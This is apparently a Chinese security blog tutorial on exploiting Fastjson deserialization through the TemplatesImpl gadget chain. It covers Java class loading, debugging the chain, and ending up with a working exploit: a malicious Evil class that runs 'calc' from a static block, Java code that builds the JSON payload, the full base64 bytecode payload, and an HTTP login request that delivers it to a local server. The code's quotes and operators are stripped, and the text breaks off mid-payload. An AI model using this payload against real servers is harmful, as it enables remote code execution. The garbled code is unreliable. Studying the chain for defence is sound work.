凡科建站手机网站建设,省财政厅经济建设处网站,做网站的IT行业,网站建设需要什么岗位的人文章目录 1、类加载与反射调用1.1、类加载1.2、测试代码1.3、通过类的加载和反射调用evil类 2、Fastjson TemplatesImpl链调试2.1、链路总览2.2、调试构造利用链 3、fastjson反序列化TemplatesImpl 利⽤3.1、开启 Feature.SupportNonPublicField 得作用3.2、构造利用payload3.3… 文章目录 1、类加载与反射调用1.1、类加载1.2、测试代码1.3、通过类的加载和反射调用evil类 2、Fastjson TemplatesImpl链调试2.1、链路总览2.2、调试构造利用链 3、fastjson反序列化TemplatesImpl 利⽤3.1、开启 Feature.SupportNonPublicField 得作用3.2、构造利用payload3.3、模拟实际环境 1、类加载与反射调用
1.1、类加载
当实例化一个类的过程会经历下面四步按照顺序
1、加载Loading
2、链接Linking
3、初始化Initialization
4、实例化Instantiation另外在说下静态块静态初始化块静态块是一个在类加载时执行的代码块用于执行一些静态初始化操作
。
注意的是同一个机器在多次实例化一个类的过程构造方法会在每次实例化的过程调用而静态块仅仅在第一次实例化的过程被调用。备注
但是实际测试与上面的理论有一些区别不知道为什么简单而言
static代码块内容理论在类被加载的时候就会被调用
实际上必须在类实例化的时候才会调用
这要注意Evil类的位置我们看到当类多次实例化static静态代码块的内容仅仅会在第一次类被加载的时候执行这个就是上面对应的问题理论上类被加载的时候static静态代码块的内容就会被执行但是实际测试看到没有进一步实例化的话static静态代码块的内容就没执行有的同学可能会说因为 static代码块 的内容仅仅会被执行一次是不是上面执行过了所以没被执行我们在解开注释发现就好了这个static代码块的执行确实有点奇怪
1.2、测试代码
创建一个evil类代码如下
public class Evil {static {System.out.println(静态代码块);}{System.out.println(构造代码块);}public Evil() {System.out.println(无参构造);}public Evil(String arg) {System.out.println(有参构造);}
}类加载的代码
package com.example.test;
public class test {public static void main(String[] args) throws Exception {Class? clazz ClassLoader.getSystemClassLoader().loadClass(Evil); //把类加载进来clazz.newInstance(); //实例化evil类System.out.println(-------------);clazz.newInstance();// System.out.println(-------------);
// // 获取类的构造函数假设有一个带有int和String参数的构造函数
// Constructor? constructor clazz.getConstructor(String.class);
// // 创建类的实例传入参数
// Object evilInstance constructor.newInstance(asd);}}1.3、通过类的加载和反射调用evil类
这个是另一种通过类加载的方式来实例化evil类loadClass与defineClass都是 java.lang.ClassLoader 类的方法但是因为上面的loadClass是public所以可以直接调用但是下面的defineClass是protected所以需要配合反射机制来调用。然后仅仅看这两个方法如何触发漏洞loadclass是就一个传参可控且被实例化就可以defineClass是4个传参可控且被实例化才可以
protected final Class? defineClass(String name, byte[] b, int off, int len);name指定要被类加载的类名称。b需要被类加载 的 类节码字节数组。off即上面数组哪个位置开始加载一般是0也就是从头开始len要加载的长度一般是bytes.length也就是上面数组全部加载
放下理想情况下的代码和执行结果
package com.example.test;
import java.lang.reflect.Method;
import java.nio.file.Files;
import java.nio.file.Paths;public class test {public static void main(String[] args) throws Exception {// Class? clazz ClassLoader.getSystemClassLoader().loadClass(Evil); //把类加载进来
// clazz.newInstance(); //实例化evil类
//
// System.out.println(-------------);
//
// clazz.newInstance();
//System.out.println(-------------);// 获取类的构造函数假设有一个带有int和String参数的构造函数Constructor? constructor clazz.getConstructor(String.class);// 创建类的实例传入参数Object evilInstance constructor.newInstance(asd);//通过反射调⽤defineClassClassLoader c1 ClassLoader.getSystemClassLoader(); //创建类加载对象//使用反射机制获取 ClassLoader 类的 defineClass 方法Method m ClassLoader.class.getDeclaredMethod(defineClass, String.class, byte[].class, int.class, int.class);//设置其访问权限为可访问这个方法用于定义一个类m.setAccessible(true);//从文件系统中读取一个类文件将其存储在 bytes 数组中byte[] bytes Files.readAllBytes(Paths.get(D:\\code\\java\\fastjson\\target\\classes\\Evil.class));//调用 defineClass 方法会将字节码内容转换为一个 Class 对象并返回给 clazz1Class clazz1 (Class)m.invoke(c1, Evil, bytes, 0, bytes.length);//实例化对象clazz1.newInstance();}}
public class Evil {static {System.out.println(静态代码块);}{System.out.println(构造代码块);}public Evil() {System.out.println(无参构造);}public Evil(String arg) {System.out.println(有参构造);}
}
2、Fastjson TemplatesImpl链调试
这里利用到上面的defineClass方法来实现就是那个比较麻烦的方法。
2.1、链路总览
新建一个类导入 TemplatesImpl 跟进到 414 行的 defineClass 继续跟进去就可以看到是 classloader 类的 defineClass 方法这里就找到第一个条件找到一个可控的 defineClass 方法小结下调用链
defineTransletClasses-》loader.defineClass-》defineClass从上面看到 defineTransletClasses 是私有方法也不能直接调用我们看下哪里调用了他发现第一次直接跟也就是ctrl点击无法跟进去所以右击 查找用法 然后在跟就可以跟进去了这有一个问题是有3处调用为什么要跟最后一个。因为我们在复现这个调用链前人就是从这个调用链打出的伤害所以我们也照葫芦画瓢然后其他的几处各位有兴趣也可以自己研究下能否走通。跟进来会发现存在2个if需要满足也就是_name不能为null_class需要为null稍微跟一下 _name 和 _class 都是默认就是null那么只需要反射设置一下_name的值即可当一切顺利的话运行完毕451行完成类加载在455行就运行了newInstance来实例化类。即漏洞触发的2个条件都满足~类加载参数可控~类加载被实例化然后这还一个问题是446行的getTransletInstance方法仍然不是public我们继续找下getTransletInstance在哪个方法被调用跟一下到481行的newTransformer方法是publicok小结整个链
newTransformer-》getTransletInstance-》defineTransletClasses-》loader.defineClass-》defineClass2.2、调试构造利用链
代码package com.example.test;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;public class test3 {public static void main(String[] args) throws Exception {TemplatesImpl temp new TemplatesImpl();temp.newTransformer();}
}
打个断点跟这个_name默认为空直接返回所以使用反射给_name设置一个 值设置完毕_name继续走发现395报错程序退出package com.example.test;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import java.lang.reflect.Field;public class test3 {public static void main(String[] args) throws Exception {TemplatesImpl temp new TemplatesImpl();Class aClass temp.getClass();Field filedname aClass.getDeclaredField(_name);//_name是私有变量所以我们需要绕过filedname.setAccessible(true);filedname.set(temp,xbb);temp.newTransformer();}
}分析这个 _tfactory 不能为空我们直接全文搜索下正常这个值应该赋什么直接反射赋值再走 package com.example.test;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;public class test3 {public static void main(String[] args) throws Exception {TemplatesImpl temp new TemplatesImpl();Class aClass temp.getClass();Field filedname aClass.getDeclaredField(_name);//_name是私有变量所以我们需要绕过filedname.setAccessible(true);filedname.set(temp,xbb);Field filebytecodes aClass.getDeclaredField(_bytecodes);byte[] bytes Files.readAllBytes(Paths.get(D:\\code\\java\\fastjson\\target\\classes\\Evil.class));filebytecodes.setAccessible(true);//设置二维数组filebytecodes.set(temp,new byte[][]{bytes});Field filebtfactory aClass.getDeclaredField(_tfactory);filebtfactory.setAccessible(true);filebtfactory.set(temp,new TransformerFactoryImpl());temp.newTransformer();}
}
还是报错这个拿到我们传入的恶意类evil得到其父类就是object但是object肯定不等于 ABSTRACT_TRANSLET 所以直接走到else的逻辑进而出错我们使得恶意类继承对应得父类并实现其中得2个抽象方法import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;public class Evil extends AbstractTranslet {Overridepublic void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}static {System.out.println(静态代码块);}{System.out.println(构造代码块);}public Evil() {System.out.println(无参构造);}public Evil(String arg) {System.out.println(有参构造);}
} 然后记得重新编译下得到新的evil.class然后就走完毕了虽然报错但是我们恶意得类被加载执行了小结下代码
package com.example.test;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;public class test3 {public static void main(String[] args) throws Exception {TemplatesImpl temp new TemplatesImpl();Class aClass temp.getClass();Field filedname aClass.getDeclaredField(_name);//_name是私有变量所以我们需要绕过filedname.setAccessible(true);filedname.set(temp,xbb);Field filebytecodes aClass.getDeclaredField(_bytecodes);byte[] bytes Files.readAllBytes(Paths.get(D:\\code\\java\\fastjson\\target\\classes\\Evil.class));filebytecodes.setAccessible(true);//设置二维数组filebytecodes.set(temp,new byte[][]{bytes});Field filebtfactory aClass.getDeclaredField(_tfactory);filebtfactory.setAccessible(true);filebtfactory.set(temp,new TransformerFactoryImpl());temp.newTransformer();}
} import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;public class Evil extends AbstractTranslet {Overridepublic void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}static {System.out.println(静态代码块);}{System.out.println(构造代码块);}public Evil() {System.out.println(无参构造);}public Evil(String arg) {System.out.println(有参构造);}
}
3、fastjson反序列化TemplatesImpl 利⽤
这个利用链在实战中利用较少一个原因是有一些限制3.1、开启 Feature.SupportNonPublicField 得作用
需要 JSON.parseObject或者 JSON.parse先看下这个 Feature.SupportNonPublicField 得作用先看下正常json反序列化得情况然后把set/get得一些函数给注释因为设置age、username属性得set/get函数去掉了所以输出为空 此时我们加上 Feature.SupportNonPublicField 再看下
相当于开启了给属性增加了set/get得方法。而上面我们分析 TemplatesImpl 利用链得时候细心得同学可能发现了其对应得类缺少set/get函数所以这个链利用得条件就是rd在json反序列化得时候增加 Feature.SupportNonPublicField 这个参数这也是该链利用得前提。
3.2、构造利用payload
直接给出代码重新构建下evil类加一个弹出计算器
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import java.io.IOException;public class Evil extends AbstractTranslet {Overridepublic void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}static {System.out.println(静态代码块);try {Runtime.getRuntime().exec(calc);} catch (IOException e) {throw new RuntimeException(e);}}{System.out.println(构造代码块);}public Evil() {System.out.println(无参构造);}public Evil(String arg) {System.out.println(有参构造);}
} package com.example.test;import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;public class test4 {public static void main(String[] args) throws Exception {byte[] bytes Files.readAllBytes(Paths.get(D:\\code\\java\\fastjson\\target\\classes\\Evil.class));String code Base64.getEncoder().encodeToString(bytes);final String NASTY_CLASS com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;String payload {\type\:\ NASTY_CLASS \,\_bytecodes\:[\ code \], _name:xbb, _tfactory:{}, \_outputProperties\:{}}\n;System.out.println(payload);JSON.parseObject(payload, Feature.SupportNonPublicField);}
}
效果正常
先说下这里得两个点一个是为什么需要base64编码这是因为 alibaba\fastjson\parser\JSONScanner.class 在反序列化得时候有一步骤解码得操作public byte[] bytesValue() {return IOUtils.decodeBase64(this.text, this.np 1, this.sp);
}第二个是多了一个“ _outputProperties ”是干嘛得不在跟了有兴趣直接参考https://blog.csdn.net/qq_35733751/article/details/119948833得到最终得payload
{type:com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl,_bytecodes:[yv66vgAAADQATAoADwAuCQAvADAIADEKADIAMwgANAgANQgANgoANwA4CAA5CgA3ADoHADsHADwKAAwAPQcAPgcAPwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAGTEV2aWw7AQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHAEABAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEABjxpbml0PgEAAygpVgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAA2FyZwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEACDxjbGluaXQAQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHADsBAApTb3VyY2VGaWxlAQAJRXZpbC5qYXZhDAAiACMHAEEMAEIAQwEADaehOmAoOS7oeggeWdlwcARAwARQAkAQAM5peg5YC5p6E6YCgAQAM5pyJ5YC5p6E6YCgAQAP6Z2Z5oCB5Luj56CB5Z2XBwBGDABHAEgBAARjYWxjDABJAEoBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24MACIASwEABEV2aWwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgAhAA4ADwAAAAAABQABABAAEQACABIAAAA/AAAAAwAAAAGxAAAAAgATAAAABgABAAAADgAUAAAAIAADAAAAAQAVABYAAAAAAAEAFwAYAAEAAAABABkAGgACABsAAAAEAAEAHAABABAAHQACABIAAABJAAAABAAAAAGxAAAAAgATAAAABgABAAAAEwAUAAAAKgAEAAAAAQAVABYAAAAAAAEAFwAYAAEAAAABAB4AHwACAAAAAQAgACEAAwAbAAAABAABABwAAQAiACMAAQASAAAASwACAAEAAAAVKrcAAbIAAhIDtgAEsgACEgW2AASxAAAAAgATAAAAEgAEAAAAIwAEACAADAAkABQAJQAUAAAADAABAAAAFQAVABYAAAABACIAJAABABIAAABVAAIAAgAAABUqtwABsgACEgO2AASyAAISBrYABLEAAAACABMAAAASAAQAAAApAAQAIAAMACoAFAArABQAAAAWAAIAAAAVABUAFgAAAAAAFQAlACYAAQAIACcAIwABABIAAAByAAMAAQAAAByAAISB7YABLgACBIJtgAKV6cADUu7AAxZKrcADbxAAEACAARABQACwADABMAAAAaAAYAAAAWAAgAGAARABsAFAAZABUAGgAeAB0AFAAAAAwAAQAVAAkAKAApAAAAKgAAAAcAAlQHACsJAAEALAAAAAIALQ],_name:xbb,_tfactory:{},_outputProperties:{}}3.3、模拟实际环境
详细请求数据包
POST /login HTTP/1.1
Host: localhost:8080
Content-Length: 2688
sec-ch-ua: Chromium;v95, ;Not A Brand;v99
Accept: application/json, text/javascript, */*; q0.01
Content-Type: application/json;charsetUTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
sec-ch-ua-platform: Windows
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9
Cookie: JSESSIONID580930AAC50A1A850BE624BD09D5DE32
Connection: close{type:com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl,_bytecodes:[yv66vgAAADQATAoADwAuCQAvADAIADEKADIAMwgANAgANQgANgoANwA4CAA5CgA3ADoHADsHADwKAAwAPQcAPgcAPwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAGTEV2aWw7AQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHAEABAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEABjxpbml0PgEAAygpVgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAA2FyZwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEACDxjbGluaXQAQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHADsBAApTb3VyY2VGaWxlAQAJRXZpbC5qYXZhDAAiACMHAEEMAEIAQwEADaehOmAoOS7oeggeWdlwcARAwARQAkAQAM5peg5YC5p6E6YCgAQAM5pyJ5YC5p6E6YCgAQAP6Z2Z5oCB5Luj56CB5Z2XBwBGDABHAEgBAARjYWxjDABJAEoBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24MACIASwEABEV2aWwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgAhAA4ADwAAAAAABQABABAAEQACABIAAAA/AAAAAwAAAAGxAAAAAgATAAAABgABAAAADgAUAAAAIAADAAAAAQAVABYAAAAAAAEAFwAYAAEAAAABABkAGgACABsAAAAEAAEAHAABABAAHQACABIAAABJAAAABAAAAAGxAAAAAgATAAAABgABAAAAEwAUAAAAKgAEAAAAAQAVABYAAAAAAAEAFwAYAAEAAAABAB4AHwACAAAAAQAgACEAAwAbAAAABAABABwAAQAiACMAAQASAAAASwACAAEAAAAVKrcAAbIAAhIDtgAEsgACEgW2AASxAAAAAgATAAAAEgAEAAAAIwAEACAADAAkABQAJQAUAAAADAABAAAAFQAVABYAAAABACIAJAABABIAAABVAAIAAgAAABUqtwABsgACEgO2AASyAAISBrYABLEAAAACABMAAAASAAQAAAApAAQAIAAMACoAFAArABQAAAAWAAIAAAAVABUAFgAAAAAAFQAlACYAAQAIACcAIwABABIAAAByAAMAAQAAAByAAISB7YABLgACBIJtgAKV6cADUu7AAxZKrcADbxAAEACAARABQACwADABMAAAAaAAYAAAAWAAgAGAARABsAFAAZABUAGgAeAB0AFAAAAAwAAQAVAAkAKAApAAAAKgAAAAcAAlQHACsJAAEALAAAAAIALQ],_name:xbb,_tfactory:{},_outputProperties:{}}这里注意2点一个是后端代码需要增加 Feature.SupportNonPublicField 参数第二个是一开始我是直接将payload放到下面得登录用户名得框内没有弹出计算器很怪异其实大家看下上面图中两个紫色线标记得就明白了假设将payload放到下图登录框内在服务器端payload就变为下面这种所以无法触发{username:{\type\:\com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\,\_bytecodes\:[\yv66vgAAADQATAoADwAuCQAvADAIADEKADIAMwgANAgANQgANgoANwA4CAA5CgA3ADoHADsHADwKAAwAPQcAPgcAPwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAGTEV2aWw7AQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHAEABAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEABjxpbml0PgEAAygpVgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAA2FyZwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEACDxjbGluaXQAQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHADsBAApTb3VyY2VGaWxlAQAJRXZpbC5qYXZhDAAiACMHAEEMAEIAQwEADaehOmAoOS7oeggeWdlwcARAwARQAkAQAM5peg5YC5p6E6YCgAQAM5pyJ5YC5p6E6YCgAQAP6Z2Z5oCB5Luj56CB5Z2XBwBGDABHAEgBAARjYWxjDABJAEoBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24MACIASwEABEV2aWwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgAhAA4ADwAAAAAABQABABAAEQACABIAAAA/AAAAAwAAAAGxAAAAAgATAAAABgABAAAADgAUAAAAIAADAAAAAQAVABYAAAAAAAEAFwAYAAEAAAABABkAGgACABsAAAAEAAEAHAABABAAHQACABIAAABJAAAABAAAAAGxAAAAAgATAAAABgABAAAAEwAUAAAAKgAEAAAAAQAVABYAAAAAAAEAFwAYAAEAAAABAB4AHwACAAAAAQAgACEAAwAbAAAABAABABwAAQAiACMAAQASAAAASwACAAEAAAAVKrcAAbIAAhIDtgAEsgACEgW2AASxAAAAAgATAAAAEgAEAAAAIwAEACAADAAkABQAJQAUAAAADAABAAAAFQAVABYAAAABACIAJAABABIAAABVAAIAAgAAABUqtwABsgACEgO2AASyAAISBrYABLEAAAACABMAAAASAAQAAAApAAQAIAAMACoAFAArABQAAAAWAAIAAAAVABUAFgAAAAAAFQAlACYAAQAIACcAIwABABIAAAByAAMAAQAAAByAAISB7YABLgACBIJtgAKV6cADUu7AAxZKrcADbxAAEACAARABQACwADABMAAAAaAAYAAAAWAAgAGAARABsAFAAZABUAGgAeAB0AFAAAAAwAAQAVAAkAKAApAAAAKgAAAAcAAlQHACsJAAEALAAAAAIALQ\],_name:xbb,_tfactory:{},\_outputProperties\:{}},password:{\type\:\com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\,\_bytecodes\:[\yv66vgAAADQATAoADwAuCQAvADAIADEKADIAMwgANAgANQgANgoANwA4CAA5CgA3ADoHADsHADwKAAwAPQcAPgcAPwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAGTEV2aWw7AQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHAEABAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEABjxpbml0PgEAAygpVgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAA2FyZwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEACDxjbGluaXQAQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHADsBAApTb3VyY2VGaWxlAQAJRXZpbC5qYXZhDAAiACMHAEEMAEIAQwEADaehOmAoOS7oeggeWdlwcARAwARQAkAQAM5peg5YC5p6E6YCgAQAM5pyJ5YC5p6E6YCgAQAP6Z2Z